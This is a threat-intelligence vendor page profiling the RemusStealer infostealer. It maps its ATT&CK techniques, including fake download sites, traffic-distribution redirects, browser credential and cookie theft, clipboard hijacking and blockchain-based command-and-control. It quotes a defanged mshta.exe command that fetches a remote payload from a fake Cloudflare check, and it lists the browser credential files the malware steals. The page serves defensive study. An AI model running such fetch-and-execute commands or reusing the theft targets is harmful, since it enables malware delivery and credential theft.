Skip to main content
Mallory
Back to malware
Malware

RemusStealer

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

20 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1189Drive-by CompromiseEvidence3

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event. It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely.

T1566PhishingEvidence1

Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

Execution

2 techniques
T1204User ExecutionEvidence1
TacticExecution

The page that imitates a Cloudflare verification screen and instructs the user to run: C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

T1204.002Malicious FileEvidence1
TacticExecution

The attack chain uses CloudFront-hosted JavaScript for browser fingerprinting, click tracking, and traffic routing, enabling stealthy, interaction-based redirection... The payload employs a heavily obfuscated Go loader...

Persistence

1 technique
T1205Traffic SignalingEvidence1

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

Stealth

4 techniques
T1027Obfuscated Files or InformationEvidence2
TacticStealth

SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms... Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated.

T1036MasqueradingEvidence1
TacticStealth

Check Point Research investigated a large-scale operation that impersonates open-source and freeware projects to capture search traffic, including lookalikes for researcher and security tooling such as Ghidra, dnSpy, and SpiderFoot.

T1205Traffic SignalingEvidence1

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

T1620Reflective Code LoadingEvidence1
TacticStealth

The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

Credential Access

4 techniques
T1539Steal Web Session CookieEvidence2

Browser data theft: Chromium family : History, Login Data, Login Data For Account, Network\Cookies, Web Data Firefox/NSS profiles : key4.db, cert9.db, cookies.sqlite, logins.json...

T1555Credentials from Password StoresEvidence2

Browser data theft: Chromium family : ... Login Data ... Firefox/NSS profiles : ... logins.json ... Chromium key material : extracts the master key from Local State via DPAPI (CryptUnprotectData)

T1555.003Credentials from Web BrowsersEvidence1

Browser data theft: Chromium family : History, Login Data, Login Data For Account, Network\Cookies, Web Data ... Firefox/NSS profiles : ... logins.json

T1649Steal or Forge Authentication CertificatesEvidence1

RemusStealer is a newly emerged infostealer targeting data from more than 20 browsers, including cryptocurrency wallets, password managers, and two-factor authentication tools.

Discovery

2 techniques
T1012Query RegistryEvidence1
TacticDiscovery

Registry reconnaissance : server-controlled queries of arbitrary path/value pairs, with HKCU-relative support and WOW64 view retry logic.

T1083File and Directory DiscoveryEvidence1
TacticDiscovery

data contains: path, mask, depth, size, link ... Expands %ENV% paths, traverses directories with filters/limits, collects matching file contents, packages results, and uploads them to C2.

Collection

3 techniques
T1005Data from Local SystemEvidence1

The agent executes tasks in a loop ... File-system search + exfiltration ... Browser data theft ... Registry reconnaissance ... Clipboard theft ... Screenshot capture

T1113Screen CaptureEvidence1

Screenshot capture : supported and exfiltrated as Screenshot.bmp when enabled by an internal flag

T1115Clipboard DataEvidence1

Clipboard theft : captures CF_UNICODETEXT, exfiltrated as Clipboard.txt ... At a high level, the final payload is a clipboard-hijacking crypto clipper: it continuously monitors the clipboard for cryptocurrency wallet strings ... replaces the copied address with one of multiple attacker-controlled wallet addresses.

T1071Application Layer ProtocolEvidence1

...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver...

T1071.001Web ProtocolsEvidence1

The stealer polls the C2 using HTTP POST requests ... The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins

T1102.001Dead Drop ResolverEvidence1

...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver, demonstrating advanced evasion and resilient C2 techniques...

T1205Traffic SignalingEvidence1

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

INDICATORS OF COMPROMISE

IOCs tracked for this family

39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
27 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
9 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
uri●●●●●●●●●●●●View more in apptoday
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching39

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping20

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.